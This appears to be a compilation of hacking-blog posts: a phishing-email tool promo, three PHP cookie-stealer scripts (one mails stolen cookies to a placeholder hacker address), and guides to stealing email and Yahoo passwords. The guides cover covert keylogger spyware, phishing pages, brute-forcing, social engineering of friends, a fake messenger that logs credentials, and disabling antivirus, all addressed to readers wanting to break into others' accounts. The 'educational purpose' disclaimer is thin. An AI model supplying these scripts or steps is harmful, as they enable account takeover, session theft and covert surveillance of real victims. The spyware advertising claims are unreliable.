SpearPhisher – A Simple Phishing Email Generation Tool

SpearPhisher is a simple point and click Windows GUI tool designed for (mostly) non-technical people who would like to supplement the education and awareness aspect of their information security program. Not only is it useful to non-technical folks, penetration testers may find it handy for sending quick and easy ad-hoc phishing emails. The tool supports specifying different sending names and email addresses, multiple recipients via TO, CC, BCC, and allows bulk loading with one recipient email address per line in a file. It allows customization of the subject, adding one attachment, and SSL support for SMTP enabled mail servers. One of the popular features with our client is the WYSIWYG HTML editor that allows virtually anyone to use the tool; previewing results as you point and click edit your malicious email body. If you want to add custom XSS exploits, client side attacks, or other payloads such as a Java Applet code generated by the Social Engineer Toolkit (SET), its split screen editor allows more advanced users to edit HTML directly.
Download : Here

Official website : Here

How to create cookie stealer Coding in PHP?~ get via email

Here is the simple Cookie Stealer code:

Cookie stored in File:

<?php
$cookie = $HTTP_GET_VARS["cookie"];
$steal = fopen("cookiefile.txt", "a");
fwrite($steal, $cookie ."\\n");
fclose($steal);
?>

$cookie = $HTTP_GET_VARS["cookie"]; steal the cookie from the current url(stealer.php?cookie=x)and store the cookies in $cookie variable.

$steal = fopen("cookiefile.txt", "a"); This open the cookiefile in append mode so that we can append the stolen cookie.

fwrite($steal, $cookie ."\\n"); This will store the stolen cookie inside the file.

fclose($steal); close the opened file.

Another version: Sends cookies to the hacker mail  

<?php
$cookie = $HTTP_GET_VARS["cookie"]; mail("hackerid@mailprovider.com", "Stolen Cookies", $cookie);
?>

The above code will mail the cookies to hacker mail using the PHP() mail function with subject "Stolen cookies". 

Third Version

<?php
function GetIP()
{
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
        $ip = getenv("HTTP_CLIENT_IP");
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
        $ip = getenv("HTTP_X_FORWARDED_FOR");
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
        $ip = getenv("REMOTE_ADDR");
    else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
        $ip = $_SERVER['REMOTE_ADDR'];
    else
        $ip = "unknown";
    return($ip);
}
function logData()
{
    $ipLog="log.txt";
    $cookie = $_SERVER['QUERY_STRING'];
    $register_globals = (bool) ini_get('register_gobals');
    if ($register_globals) $ip = getenv('REMOTE_ADDR');
    else $ip = GetIP();

    $rem_port = $_SERVER['REMOTE_PORT'];
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    $rqst_method = $_SERVER['METHOD'];
    $rem_host = $_SERVER['REMOTE_HOST'];
    $referer = $_SERVER['HTTP_REFERER'];
    $date=date ("l dS of F Y h:i:s A");
    $log=fopen("$ipLog", "a+");

    if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie <br>");
    else
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie \n\n");
    fclose($log);
}
logData();
?>

 The above Cookie stealer will store the following information:

• Ip address
• port number
• host(usually computer-name)
• user agent
• cookie

This Article is for Educational purpose only This article is for creating public awareness about the Internet Risks.

How To Hack E-Mail Password - E-Mail Hacking Software

I know most of you might be wondering to know how to hack email? You as the reader are most likely reading this because you want to hack into someone’s email. Well before you try to hack any E-Mail password, it is necessary to understand the real ways of hacking that actually work and also those that are simply scam and don’t work. Everyday I get a lot of emails where people ask me “how to hack E-Mail password?” So in this post I have taken up this topic to show you the possible ways to do that!
Is it possible to hack emails?

Yes! As a matter of fact, almost anything can be hacked. But before you learn the real ways to hack email, the following are the things you should be aware of.

1. There is no ready made software that can hack emails and get you the password just with a click of a button. So if you come across any website that claims to sell such softwares, I would advise you not to trust them.

2. Never trust any email hacking service that claims to hack any email for just $100 or $200. Most of them are no more than a scam.

So, guys, remember this is all crap. There's no reality in this email hacking service or software.

How can we Hack Email Password?

Hacking email passwords is not that easy. You can't do that by simply entering the email address and waiting for the software to crack passwords. Instead, you have to fool victim to give his own password without his knowledge. The main methods used to hack Email passwords are:

1. Remote Spy Software

The easiest way to hack an email is by using a remote spy software (Also known as keylogger). A keylogger is a small program that monitors each and every keystroke that a user types on a specific computer’s keyboard. Once installed, this program will automatically load from the start-up, runs in invisible mode and start capturing each and every keystroke that was typed on the computer. Some keyloggers with advanced features can also capture screenshots and monitor every activity on the computer. To install and use a kelooger one doesn’t need to have any special knowledge. That means anyone with a basic knowledge of computer can install and use this software with ease. Hence for a novice computer user this method is the easiest way to hack email password. I recommend the following keylogger as the best for gaining access to email password.

SniperSpy is a revolutionary product that will allow you to easily access *ANY* online account or password protected material such as MySpace, Facebook, Yahoo, Gmail etc. There are absolutely *NO* limitations to what accounts or websites this software can access!

Once installed on the remote PC(s) you wish, you only need to login to your own personal SniperSpy account to view activity logs of the remote PC’s! This means that you can view logs of the remote PC’s from anywhere in the world as long as you have internet access!


Why SniperSpy is the best?

Today there exists hundreds of keyloggers on the market but most of them are no more than a crap. However there are only a few that stand out of the crowd and SniperSpy is the best among them. I personally like SniperSpy for it’s REMOTE INSTALLATION FEATURE. With this you can install it on a remote computer without the need for having physical access to it. It operates in complete stealth mode so that it remains undetected. This Remote PC Spy software also saves screenshots along with text logs of chats, websites, keystrokes in any language and more. Includes LIVE admin and control commands!

SniperSpy Features:

• Access ANY Password

With SniperSpy you can hack any password and gain access to email or any other online account.

• Monitor Every Activity

You can monitor every activity of the target computer, take screenshots and record chats & IM conversations.

• Never Get Caught

SniperSpy operates in total stealth mode and thus remains undetectable. Thus you need not have the fear of being traced or get caught.

• Remote Installation Feature

With Remote Install feature, it is possible to install it even on computers for which you do not have physical access. However it can also be installed on a local computer.

• Extremely Easy to Use

Installing and using SniperSpy is simple and needs no extra skill to manage.

• Completely Safe to Use

This software is 100% safe to use since it doesn’t collect any information from your computer. SniperSpy is a reputed, trustworthy and reliable company which offers 100% privacy for it’s users.

• Works on both Windows and Mac

Fully compatible with Windows 2000/XP/Vista/7 and Mac.

So what are you waiting for? If you are really serious to hack E-Mail Password then SniperSpy is for you. Go grab it now and expose the truth!

Download SniperSpy Now!

Download SniperSpy for Mac

2. Other Ways to Hack E-Mail Password


- Phishing

In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public.

How does it work:

You can download/make a replica of the website you want to phish and save is as HTML. When you’re done with that, you have to find a way to upload the HTML. You can use free hosting site or a website like Blogspot, Piczo, etc. When the victim enters his email and password on the login field, phishing site save those login details and they will be automatically sent to you by mail.

Perform Phishing

- Bruteforcing

This is somewhat debating method. I have never personally tried but, read on various site and hacking forums. It is said that Hotmail accounts can be bruteforced. In Bruteforcing, you have to get wordlist - which contains various words and these words are tried out as passwords for victim hotmail account. Generally, for other sites like Gmail, Yahoo, etc. you have limited account login chances and once that number of chances expire, you are not allowed even to try to login. This mechanism helps in avoiding Bruteforce attack against email accounts. So, it is debating to say that Hotmail account passwords can be hacked (actually cracked) by Bruteforcing.

The most famous Bruteforcing software used is Brutus. But, remember, for hacking hotmail account password by Bruteforcing, you must have good quality wordlist which can be obtained via Google.


- Social engineering

This sounds to be pretty not working at beginning. Even I was neglecting this way. But, once, I thought of using it against my friend on orkut and i got his gmail password very easily by this method. I think many of you might be knowing how what this social engg is. For newbies, social engineering is method of retrieving password or answer of security question simply be queering with the victim. You have to be very careful while using this as victim must not be aware of your intention. Just ask him cautiously using your logic.


- USB Thief

As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend's/college Computer.


So friends, these are most useful ways to hack email account password. I have tested most of them and found to be working to hack email account password. Just give them a try to hack your victim email account passwords. I will appreciate your effort if you mention any other email hacking method you found great to hack email account password. Happy Email Hacking!

Do you have questions, comments, or suggestions? Feel free to post a comment!

Email Hacking -How to Hack Yahoo Accounts ?

When i was searching on the net i found many of the people interested in Hacking Yahoo Passwords and many of them asking this type of question in different Form but they won't get any proper reply so i decided why not to write a article about Hacking Yahoo Account Passwords.

Hacking Yahoo Accounts is easy but it is possible only when HE(Target Account to be Hacked) is your friend.



I found one password Hacking program for Yahoo. Yahoo Account can be hacked by using the program called Fake Yahoo Messenger.

Fake Yahoo Messenger:

It is a software appearing like yahoo messenger(old version type)



and when ever some one trying to Log In to there account by this fake yahoo messenger the password will be saved in your PC and also they won't be able to log in to there account because it always show an error as shown below



Steps for Hacking Yahoo Messenger passwords:

1. Install Microsoft.Net Frame Work i think almost everyone has this software in their computer if not click here to download.

2. Download Free tool for hacking yahoo accounts(fake yahoo messenger)

File Size : 30.54 KB





3. Rename Fake Yahoo Messenger to Yahoo Messenger

4. Tell your friends to Log In.

Hint: If any of your friends asked why your using old version then tell this reasons...

* Faster load

* No ads inside the chat room etc(As i already told that they won't able to log in to there account by using this software than how can they see inside is there any ads ?)

* Or else tell them this is a new beta version and etc..

It all depends on your skills to Log in your friends...

5. After your friends log in open c:\yahoo.txt and that's your friend Yahoo Id and Password.

NOTE: You need to disable your ANTI VIRUS when all this process is going on.

Feel free to comment about your opinion... If you like please Digg it... and also don't forget to subscribe to our newsletters.